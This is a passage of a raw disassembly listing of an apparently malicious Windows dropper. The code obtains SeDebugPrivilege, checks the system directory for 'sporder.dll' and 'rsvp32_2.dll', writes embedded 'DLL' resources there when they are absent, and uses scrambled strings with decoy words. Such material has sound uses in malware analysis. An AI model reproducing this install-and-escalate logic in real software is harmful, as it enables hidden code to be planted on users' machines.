lea eax, [esp+188h+var_174]
push 64h
push eax
call dword_401048+4
lea ecx, [esp+188h+var_174]
lea edi, [esi+14h]
push ecx
mov ecx, edi
mov [esp+eax+18Ch+var_174], bl
call sub_402686
lea edx, [esp+188h+var_174]
push 64h
push edx
call dword_401048 ; GetSystemDirectoryA
mov [esp+eax+188h+var_174], bl
lea ebp, [esi+18h]
lea eax, [esp+188h+var_174]
mov ecx, ebp
push eax
call sub_402686
cmp [esp+188h+arg_4], ebx
jz short loc_401DBD
push ebx
call sub_4026C2
loc_401DBD: ; CODE XREF: sub_401D20+95�j
lea ecx, [esp+188h+var_110]
push 104h
push ecx
push ebx
call off_401044
push eax
call dword_40103C+4
cmp [esp+188h+arg_0], ebx
jz short loc_401DE5
mov ecx, esi
call sub_401FD0
loc_401DE5: ; CODE XREF: sub_401D20+BC�j
lea ebx, [esi+1Ch]
lea edx, [esp+188h+var_110]
push edx
mov ecx, ebx
call sub_402686
push ecx
lea eax, [esp+190h+arg_8]
mov ecx, esp
mov dword ptr [esp+190h+var_17C], esp
push eax
call sub_4026AA
mov ecx, esi
call sub_402050
mov ecx, edi
call sub_40269E
mov ecx, ebp
call sub_40269E
mov ecx, ebx
call sub_40269E
lea ecx, [esp+188h+arg_C]
mov [esp+188h+var_4], 0FFFFFFFFh
call sub_40268C
mov ecx, [esp+188h+var_C]
pop edi
pop esi
pop ebp
mov large fs:0, ecx
pop ebx
add esp, 178h
retn 10h
sub_401D20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401E60 proc near ; CODE XREF: sub_4022F0+251�p
; sub_4022F0+29F�p
var_1C = dword ptr -1Ch
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0FFFFFFFFh
push offset SEH_401E60
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 10h
push esi
push edi
mov [esp+24h+var_4], 1
call sub_4026E0
mov ecx, [esp+24h+arg_8]
mov edx, [esp+24h+arg_4]
mov eax, [eax+0Ch]
push ecx
push edx
push eax
call dword_401048+10h
mov esi, eax
test esi, esi
jz loc_401F4B
call sub_4026E0
mov eax, [eax+0Ch]
push esi
push eax
call dword_401048+0Ch
mov edi, eax
call sub_4026E0
mov eax, [eax+0Ch]
push esi
push eax
call dword_401048+8
mov esi, eax
test esi, esi
jz short loc_401F4B
lea ecx, [esp+24h+var_1C]
call sub_4026DA
mov eax, [esp+24h+arg_0]
push 0
push 1021h
push eax
lea ecx, [esp+30h+var_1C]
mov byte ptr [esp+30h+var_4], 2
call sub_4026D4
mov edx, [esp+24h+var_1C]
push edi
push esi
lea ecx, [esp+2Ch+var_1C]
call dword ptr [edx+40h]
lea ecx, [esp+24h+var_1C]
call sub_4026CE
lea ecx, [esp+24h+var_1C]
mov byte ptr [esp+24h+var_4], 1
call sub_4026C8
lea ecx, [esp+24h+arg_0]
mov byte ptr [esp+24h+var_4], 0
call sub_40268C
lea ecx, [esp+24h+arg_8]
mov [esp+24h+var_4], 0FFFFFFFFh
call sub_40268C
pop edi
mov eax, 1
pop esi
mov ecx, [esp+1Ch+var_C]
mov large fs:0, ecx
add esp, 1Ch
retn 0Ch
; ---------------------------------------------------------------------------
loc_401F4B: ; CODE XREF: sub_401E60+3F�j
; sub_401E60+6B�j
lea ecx, [esp+24h+arg_0]
mov byte ptr [esp+24h+var_4], 0
call sub_40268C
lea ecx, [esp+24h+arg_8]
mov [esp+24h+var_4], 0FFFFFFFFh
call sub_40268C
mov ecx, [esp+24h+var_C]
pop edi
xor eax, eax
pop esi
mov large fs:0, ecx
add esp, 1Ch
retn 0Ch
sub_401E60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401F80 proc near ; CODE XREF: sub_401D20+35�p
push 0
call dword ptr loc_40119F+1
push eax
call dword ptr loc_4011A3+1
add esp, 8
retn
sub_401F80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401FA0 proc near ; CODE XREF: sub_4022F0+212�p
; sub_4022F0+260�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push offset aR ; "r"
push eax
call dword ptr loc_401197+1
add esp, 8
test eax, eax
jnz short loc_401FBA
retn 4
; ---------------------------------------------------------------------------
loc_401FBA: ; CODE XREF: sub_401FA0+15�j
push eax
call dword ptr loc_401199+3
add esp, 4
mov eax, 1
retn 4
sub_401FA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401FD0 proc near ; CODE XREF: sub_401D20+C0�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 1Ch
lea eax, [esp+1Ch+var_1C]
push eax
push 28h
call dword_40102C ; GetCurrentProcess
push eax
call dword_401000 ; OpenProcessToken
test eax, eax
jnz short loc_401FEF
add esp, 1Ch
retn
; ---------------------------------------------------------------------------
loc_401FEF: ; CODE XREF: sub_401FD0+19�j
lea ecx, [esp+1Ch+var_18]
push ecx
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
call dword_401000+4
test eax, eax
jnz short loc_402009
add esp, 1Ch
retn
; ---------------------------------------------------------------------------
loc_402009: ; CODE XREF: sub_401FD0+33�j
mov edx, [esp+1Ch+var_18]
mov eax, [esp+1Ch+var_14]
push 0
push 0
lea ecx, [esp+24h+var_10]
mov [esp+24h+var_C], edx
mov edx, [esp+24h+var_1C]
push 10h
push ecx
push 0
push edx
mov [esp+34h+var_10], 1
mov [esp+34h+var_8], eax
mov [esp+34h+var_4], 2
call dword_401000+8
call dword_401048+14h
neg eax
sbb eax, eax
inc eax
add esp, 1Ch
retn
sub_401FD0 endp
; =============== S U B R O U T I N E =======================================
sub_402050 proc near ; CODE XREF: sub_401D20+EA�p
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = byte ptr 4
mov eax, large fs:0
push 0FFFFFFFFh
push offset SEH_402050
push eax
mov large fs:0, esp
lea eax, [esp+0Ch+arg_0]
add ecx, 20h
push eax
mov [esp+10h+var_4], 0
call sub_402692
lea ecx, [esp+0Ch+arg_0]
mov [esp+0Ch+var_4], 0FFFFFFFFh
call sub_40268C
mov ecx, [esp+0Ch+var_C]
mov large fs:0, ecx
add esp, 0Ch
retn 4
sub_402050 endp
; ---------------------------------------------------------------------------
align 10h
loc_4020A0: ; DATA XREF: _0:off_4013A8�o
mov eax, dword_401064+98h
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4020B0 proc near ; DATA XREF: _0:00401410�o
mov eax, offset off_4013A8
retn
sub_4020B0 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_402140
loc_4020C0: ; CODE XREF: sub_402140+5�j
push esi
mov esi, ecx
push 0
call sub_4027B8
mov dword ptr [esi], offset off_4013E0
mov eax, esi
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_402140
; ---------------------------------------------------------------------------
align 10h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_4. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_3. PRESS KEYPAD "+" TO EXPAND]
align 10h
loc_402100: ; DATA XREF: _0:004013E4�o
push esi
mov esi, ecx
call sub_402120
test byte ptr [esp+8], 1
jz short loc_402118
push esi
call sub_4027BE
add esp, 4
loc_402118: ; CODE XREF: _0:0040210D�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402120 proc near ; CODE XREF: _0:00402103�p _0:00402165�j
jmp sub_4027C4
sub_402120 endp
; ---------------------------------------------------------------------------
align 10h
loc_402130: ; DATA XREF: _0:004011DC�o
call sub_402140
jmp loc_402150
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402140 proc near ; CODE XREF: _0:loc_402130�p
; FUNCTION CHUNK AT 004020C0 SIZE 00000014 BYTES
mov ecx, offset dword_402EE8
jmp loc_4020C0
sub_402140 endp
; ---------------------------------------------------------------------------
align 10h
loc_402150: ; CODE XREF: _0:00402135�j
push offset loc_402160
call sub_40283C
pop ecx
retn
; ---------------------------------------------------------------------------
align 10h
loc_402160: ; DATA XREF: _0:loc_402150�o
mov ecx, offset dword_402EE8
jmp sub_402120
; ---------------------------------------------------------------------------
align 10h
loc_402170: ; DATA XREF: _0:004011E0�o
call sub_402180
jmp loc_402190
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402180 proc near ; CODE XREF: _0:loc_402170�p
push 0
mov ecx, offset dword_402FB0
call sub_401C70
retn
sub_402180 endp
; ---------------------------------------------------------------------------
align 10h
loc_402190: ; CODE XREF: _0:00402175�j
push offset loc_4021A0
call sub_40283C
pop ecx
retn
; ---------------------------------------------------------------------------
align 10h
loc_4021A0: ; DATA XREF: _0:loc_402190�o
mov ecx, offset dword_402FB0
jmp loc_4021B0
; ---------------------------------------------------------------------------
align 10h
loc_4021B0: ; CODE XREF: _0:004021A5�j
push 0FFFFFFFFh
push offset loc_402BA9
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push esi
mov esi, ecx
mov [esp+4], esi
lea ecx, [esi+20h]
mov dword ptr [esp+10h], 3
call sub_40268C
lea ecx, [esi+1Ch]
mov byte ptr [esp+10h], 2
call sub_40268C
lea ecx, [esi+18h]
mov byte ptr [esp+10h], 1
call sub_40268C
lea ecx, [esi+14h]
mov byte ptr [esp+10h], 0
call sub_40268C
mov ecx, esi
mov dword ptr [esp+10h], 0FFFFFFFFh
call sub_4026B0
mov ecx, [esp+8]
pop esi
mov large fs:0, ecx
add esp, 10h
retn
; ---------------------------------------------------------------------------
align 10h
loc_402230: ; DATA XREF: _0:004011E4�o
call sub_402240
jmp loc_402250
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402240 proc near ; CODE XREF: _0:loc_402230�p
var_120 = byte ptr -120h
var_114 = dword ptr -114h
var_110 = byte ptr -110h
var_FC = dword ptr -0FCh
var_F4 = byte ptr -0F4h
var_F0 = byte ptr -0F0h
var_E8 = dword ptr -0E8h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_D8 = byte ptr -0D8h
var_D7 = byte ptr -0D7h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_30 = dword ptr 34h
; FUNCTION CHUNK AT 00401A20 SIZE 00000223 BYTES
mov ecx, offset dword_402FE8
jmp loc_401A20
sub_402240 endp
; ---------------------------------------------------------------------------
align 10h
loc_402250: ; CODE XREF: _0:00402235�j
push offset loc_402260
call sub_40283C
pop ecx
retn
; ---------------------------------------------------------------------------
align 10h
loc_402260: ; DATA XREF: _0:loc_402250�o
mov ecx, offset dword_402FE8
jmp loc_402270
; ---------------------------------------------------------------------------
align 10h
loc_402270: ; CODE XREF: _0:00402265�j
push 0FFFFFFFFh
push offset loc_402BF4
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push esi
mov esi, ecx
mov [esp+4], esi
lea ecx, [esi+14h]
mov dword ptr [esp+10h], 4
call sub_40268C
lea ecx, [esi+10h]
mov byte ptr [esp+10h], 3
call sub_40268C
lea ecx, [esi+0Ch]
mov byte ptr [esp+10h], 2
call sub_40268C
lea ecx, [esi+8]
mov byte ptr [esp+10h], 1
call sub_40268C
lea ecx, [esi+4]
mov byte ptr [esp+10h], 0
call sub_40268C
mov ecx, esi
mov dword ptr [esp+10h], 0FFFFFFFFh
call sub_40268C
mov ecx, [esp+8]
pop esi
mov large fs:0, ecx
add esp, 10h
retn
; =============== S U B R O U T I N E =======================================
sub_4022F0 proc near ; DATA XREF: _0:00401438�o
var_4C = byte ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_3C = byte ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push 0FFFFFFFFh
push offset SEH_4022F0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 3Ch
push ebx
push esi
push offset aNjosphlbmombii ; " njosphlbmombiifgomrkdmdfgr"
lea ecx, [esp+54h+var_3C]
call sub_4026B6
xor ebx, ebx
push offset aEndedIn ; "ended in "
lea ecx, [esp+54h+var_40]
mov [esp+54h+var_4], ebx
call sub_4026B6
lea ecx, [esp+50h+var_3C]
mov byte ptr [esp+50h+var_4], 1
call sub_4027CA
lea ecx, [esp+50h+var_40]
call sub_4027CA
lea ecx, [esp+50h+var_40]
mov byte ptr [esp+50h+var_4], bl
call sub_40268C
or esi, 0FFFFFFFFh
lea ecx, [esp+50h+var_3C]
mov [esp+50h+var_4], esi
call sub_40268C
push offset aHsebnfmsqijorf ; " hsebnfmsqijorfjooonckehpdp"
lea ecx, [esp+54h+var_40]
call sub_4026B6
push offset a1992 ; "1992 "
lea ecx, [esp+54h+var_3C]
mov [esp+54h+var_4], 2
call sub_4026B6
lea ecx, [esp+50h+var_40]
mov byte ptr [esp+50h+var_4], 3
call sub_4027CA
lea ecx, [esp+50h+var_3C]
call sub_4027CA
lea ecx, [esp+50h+var_3C]
mov byte ptr [esp+50h+var_4], 2
call sub_40268C
lea ecx, [esp+50h+var_40]
mov [esp+50h+var_4], esi
call sub_40268C
push offset aNrlqomhqibqjsq ; " nrlqomhqibqjsqderqpkghlrk"
lea ecx, [esp+54h+var_40]
call sub_4026B6
push offset aLaboratory ; "Laboratory "
lea ecx, [esp+54h+var_3C]
mov [esp+54h+var_4], 4
call sub_4026B6
lea ecx, [esp+50h+var_40]
mov byte ptr [esp+50h+var_4], 5
call sub_4027CA
lea ecx, [esp+50h+var_3C]
call sub_4027CA
lea ecx, [esp+50h+var_3C]
mov byte ptr [esp+50h+var_4], 4
call sub_40268C
lea ecx, [esp+50h+var_40]
mov [esp+50h+var_4], esi
call sub_40268C
push offset aGobmccpsmrmggc ; " gobmccpsmrmggcomcenldrg"
lea ecx, [esp+54h+var_40]
call sub_4026B6
push offset aPersonnel ; "personnel "
lea ecx, [esp+54h+var_3C]
mov [esp+54h+var_4], 6
call sub_4026B6
lea ecx, [esp+50h+var_40]
mov byte ptr [esp+50h+var_4], 7
call sub_4027CA
lea ecx, [esp+50h+var_3C]
call sub_4027CA
lea ecx, [esp+50h+var_3C]
mov byte ptr [esp+50h+var_4], 6
call sub_40268C
lea ecx, [esp+50h+var_40]
mov [esp+50h+var_4], esi
call sub_40268C
lea ecx, [esp+50h+var_10]
call sub_4026A4
push ecx
mov [esp+54h+var_4], 8
mov ecx, esp
mov [esp+54h+var_38], esp
push offset dword_403008
call sub_4026B6
push 1
push 1
push 1
mov ecx, offset dword_402FB0
call sub_401D20
lea eax, [esp+4Ch+var_38]
mov ecx, offset dword_402FE8
push eax
call sub_402640
push offset aSporder_dll ; "sporder.dll"
lea ecx, [esp+50h+var_40]
push eax
push ecx
mov byte ptr [esp+58h], 9
call sub_402698
lea ecx, [esp+50h+var_3C]
mov byte ptr [esp+50h+var_4], 0Bh
call sub_40268C
lea edx, [esp+50h+var_38]
mov ecx, offset dword_402FE8
push edx
call sub_402640
push offset aRsvp32_2_dll ; "rsvp32_2.dll"
push eax
lea eax, [esp+58h+var_48]
mov byte ptr [esp+58h+var_4], 0Ch
push eax
call sub_402698
lea ecx, [esp+50h+var_38]
mov byte ptr [esp+50h+var_4], 0Eh
call sub_40268C
mov ecx, [esp+50h+var_44]
push ecx
mov ecx, offset dword_402FB0
call sub_401FA0
test eax, eax
jnz short loc_402546
push ecx
mov ecx, esp
mov dword ptr [esp+54h+var_40], esp
push offset aDll ; "DLL"
call sub_4026B6
push 81h
push ecx
lea edx, [esp+58h+var_40]
mov ecx, esp
mov dword ptr [esp+58h+var_30], esp
push edx
mov byte ptr [esp+5Ch], 0Fh
call sub_4026AA
mov ecx, offset dword_402FB0
mov byte ptr [esp+5Ch+var_4], 0Eh
call sub_401E60
loc_402546: ; CODE XREF: sub_4022F0+219�j
mov eax, [esp+50h+var_48]
mov ecx, offset dword_402FB0
push eax
call sub_401FA0
test eax, eax
jnz short loc_40259C
push ecx
mov ecx, esp
mov dword ptr [esp+54h+var_34], esp
push offset aDll ; "DLL"
call sub_4026B6
push 83h
push ecx
lea edx, [esp+60h+var_4C]
mov ecx, esp
mov [esp+60h+var_44], esp
push edx
mov byte ptr [esp+64h+var_8], 10h
call sub_4026AA
mov ecx, offset dword_402FB0
mov byte ptr [esp+58h], 0Eh
call sub_401E60
push 64h
call dword_401030 ; Sleep
loc_40259C: ; CODE XREF: sub_4022F0+267�j
push offset aRsvp32_2_dll ; "rsvp32_2.dll"
mov eax, 6A31F261h
sub esp, 10h
mov word ptr [esp+64h+var_2C], 0DF30h
mov ecx, esp
mov word ptr [esp+64h+var_2C+2], 11CFh
mov edx, [esp+64h+var_2C]
mov byte ptr [esp+64h+var_28], 89h
mov [ecx], eax
mov byte ptr [esp+64h+var_28+1], 27h
mov byte ptr [esp+64h+var_28+2], bl
mov byte ptr [esp+64h+var_28+3], 0AAh
mov eax, [esp+64h+var_28]
mov [ecx+4], edx
mov byte ptr [esp+64h+var_24], bl
mov byte ptr [esp+64h+var_24+1], 53h
mov byte ptr [esp+64h+var_24+2], 9Fh
mov byte ptr [esp+64h+var_24+3], 1Ch
mov edx, [esp+64h+var_24]
mov [ecx+8], eax
mov [ecx+0Ch], edx
lea ecx, [esp+64h+var_20]
call sub_4017D0
lea ecx, [esp+50h+var_48]
mov byte ptr [esp+50h+var_4], 0Bh
call sub_40268C
lea ecx, [esp+50h+var_44]
mov byte ptr [esp+50h+var_4], 8
call sub_40268C
lea ecx, [esp+50h+var_10]
mov [esp+50h+var_4], esi
call sub_40268C
mov ecx, [esp+50h+var_C]
pop esi
xor eax, eax
mov large fs:0, ecx
pop ebx
add esp, 48h
retn
sub_4022F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402640 proc near ; CODE XREF: sub_4022F0+1AE�p
; sub_4022F0+1E0�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
push esi
mov esi, [esp+8+arg_0]
add ecx, 8
push offset asc_4012C8 ; "\\"
push ecx
push esi
mov [esp+14h+var_4], 0
call sub_402698
mov eax, esi
pop esi
pop ecx
retn 4
sub_402640 endp
; ---------------------------------------------------------------------------
align 10h
loc_402670: ; CODE XREF: _0:00402C43�j
add ecx, 10h
jmp sub_40268C
; ---------------------------------------------------------------------------
align 10h
jmp dword_401104+44h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402686 proc near ; CODE XREF: sub_4017D0+54�p
; sub_402240-75E�p ...
jmp dword_401104+3Ch
sub_402686 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40268C proc near ; CODE XREF: sub_402240-628�p
; sub_401D20+116�p ...
jmp dword_401104+38h
sub_40268C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402692 proc near ; CODE XREF: sub_402240-639�p
; sub_402050+25�p
jmp dword_401104+34h
sub_402692 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402698 proc near ; CODE XREF: sub_402240-64A�p
; sub_4022F0+1C3�p ...
jmp dword_401104+30h
sub_402698 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40269E proc near ; CODE XREF: sub_402240-677�p
; sub_402240-670�p ...
jmp dword_401104+2Ch
sub_40269E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4026A4 proc near ; CODE XREF: sub_402240-7FB�p
; sub_402240-7E8�p ...
jmp dword_401104+28h
sub_4026A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4026AA proc near ; CODE XREF: sub_401D20+E3�p
; sub_4022F0+242�p ...
jmp dword_401104+24h
sub_4026AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4026B0 proc near ; CODE XREF: _0:0040220E�p _0:00402AD3�j ...
jmp dword_401104+20h
sub_4026B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4026B6 proc near ; CODE XREF: sub_401C70+80�p
; sub_4022F0+23�p ...
jmp dword_401104+1Ch
sub_4026B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4026BC proc near ; CODE XREF: sub_401C70+1E�p
jmp dword_401104+18h
sub_4026BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4026C2 proc near ; CODE XREF: sub_401D20+98�p
jmp dword_401104+14h
sub_4026C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4026C8 proc near ; CODE XREF: sub_401E60+AF�p
; _0:00402B43�j
jmp dword_401104+10h
sub_4026C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4026CE proc near ; CODE XREF: sub_401E60+A1�p
jmp dword_401104+0Ch
sub_4026CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4026D4 proc near ; CODE XREF: sub_401E60+8B�p
jmp dword_401104+8
sub_4026D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4026DA proc near ; CODE XREF: sub_401E60+71�p
jmp dword_401104+4
sub_4026DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4026E0 proc near ; CODE XREF: sub_401E60+22�p
; sub_401E60+45�p ...
jmp dword_401104
sub_4026E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4026E6 proc near ; DATA XREF: _0:00401480�o
jmp dword_401064+4Ch
sub_4026E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4026EC proc near ; DATA XREF: _0:0040147C�o
jmp dword_401064
sub_4026EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4026F2 proc near ; DATA XREF: _0:00401478�o
jmp dword_401064+4
sub_4026F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4026F8 proc near ; DATA XREF: _0:00401474�o
jmp dword_401064+8
sub_4026F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4026FE proc near ; DATA XREF: _0:00401470�o
jmp dword_401064+0Ch
sub_4026FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402704 proc near ; DATA XREF: _0:0040146C�o
jmp dword_401064+10h
sub_402704 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40270A proc near ; DATA XREF: _0:00401468�o
jmp dword_401064+14h
sub_40270A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402710 proc near ; DATA XREF: _0:00401464�o
jmp dword_401064+18h
sub_402710 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402716 proc near ; DATA XREF: _0:00401460�o
jmp dword_401064+1Ch
sub_402716 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40271C proc near ; DATA XREF: _0:0040145C�o
jmp dword_401064+20h
sub_40271C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402722 proc near ; DATA XREF: _0:00401458�o
jmp dword_401064+24h
sub_402722 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402728 proc near ; DATA XREF: _0:00401454�o
jmp dword_401064+28h
sub_402728 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40272E proc near ; DATA XREF: _0:00401450�o
jmp dword_401064+2Ch
sub_40272E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402734 proc near ; DATA XREF: _0:0040144C�o
jmp dword_401064+30h
sub_402734 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40273A proc near ; DATA XREF: _0:00401448�o
jmp dword_401064+34h
sub_40273A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402740 proc near ; DATA XREF: _0:00401444�o
jmp dword_401064+38h
sub_402740 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402746 proc near ; DATA XREF: _0:00401440�o
jmp dword_401064+3Ch
sub_402746 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40274C proc near ; DATA XREF: _0:0040143C�o
jmp dword_401064+40h
sub_40274C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402752 proc near ; DATA XREF: _0:00401434�o
jmp dword_401064+44h
sub_402752 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402758 proc near ; DATA XREF: _0:00401430�o
jmp dword_401064+48h
sub_402758 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40275E proc near ; DATA XREF: _0:0040142C�o
jmp dword_401104+40h
sub_40275E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402764 proc near ; DATA XREF: _0:00401428�o
jmp dword_401064+50h
sub_402764 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40276A proc near ; DATA XREF: _0:00401424�o
jmp dword_401064+54h
sub_40276A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402770 proc near ; DATA XREF: _0:00401420�o
jmp dword_401064+58h
sub_402770 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402776 proc near ; DATA XREF: _0:0040141C�o
jmp dword_401064+5Ch
sub_402776 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40277C proc near ; DATA XREF: _0:00401418�o
jmp dword_401064+60h
sub_40277C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402782 proc near ; DATA XREF: _0:00401414�o
jmp dword_401064+64h
sub_402782 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402788 proc near ; DATA XREF: _0:0040140C�o
jmp dword_401064+68h
sub_402788 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40278E proc near ; DATA XREF: _0:00401408�o
jmp dword_401064+6Ch
sub_40278E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402794 proc near ; DATA XREF: _0:00401404�o
jmp dword_401064+70h
sub_402794 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40279A proc near ; DATA XREF: _0:00401400�o
jmp dword_401064+74h
sub_40279A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4027A0 proc near ; DATA XREF: _0:004013FC�o
jmp dword_401064+78h
sub_4027A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4027A6 proc near ; DATA XREF: _0:004013F8�o
jmp dword_401064+7Ch
sub_4027A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4027AC proc near ; DATA XREF: _0:004013F4�o
jmp dword_401064+80h
sub_4027AC endp
; ---------------------------------------------------------------------------
loc_4027B2: ; DATA XREF: _0:off_4013E0�o
jmp dword_401064+84h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4027B8 proc near ; CODE XREF: sub_402140-7B�p
jmp dword_401064+88h
sub_4027B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4027BE proc near ; CODE XREF: _0:00402110�p
jmp dword_401064+8Ch
sub_4027BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4027C4 proc near ; CODE XREF: sub_402120�j
jmp dword_401064+90h
sub_4027C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4027CA proc near ; CODE XREF: sub_4022F0+45�p
; sub_4022F0+4E�p ...
jmp dword_401064+94h
sub_4027CA endp
; =============== S U B R O U T I N E =======================================
sub_4027D0 proc near ; CODE XREF: sub_4014F0+EA�p
; sub_401630+144�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_4027F0
loc_4027DC: ; CODE XREF: sub_4027D0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_4027DC
loc_4027F0: ; CODE XREF: sub_4027D0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_4027D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402800 proc near ; CODE XREF: _0:00402ABC�j
; SEH_401C70+5�j ...
jmp dword ptr loc_4011A8
sub_402800 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402810 proc near ; CODE XREF: sub_40283C+4�p
arg_0 = dword ptr 4
cmp dword_403030, 0FFFFFFFFh
jnz short loc_402825
push [esp+arg_0]
call dword ptr loc_401190
pop ecx
retn
; ---------------------------------------------------------------------------
loc_402825: ; CODE XREF: sub_402810+7�j
push offset dword_40302C
push offset dword_403030
push [esp+8+arg_0]
call sub_4029AC
add esp, 0Ch
retn
sub_402810 endp
; =============== S U B R O U T I N E =======================================
sub_40283C proc near ; CODE XREF: _0:00402155�p _0:00402195�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_402810
neg eax
sbb eax, eax
pop ecx
neg eax
dec eax
retn
sub_40283C endp
; ---------------------------------------------------------------------------
loc_40284E: ; CODE XREF: _1:0040E2C4�j
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_401488
push offset sub_4029D4
mov eax, large fs:0
push eax
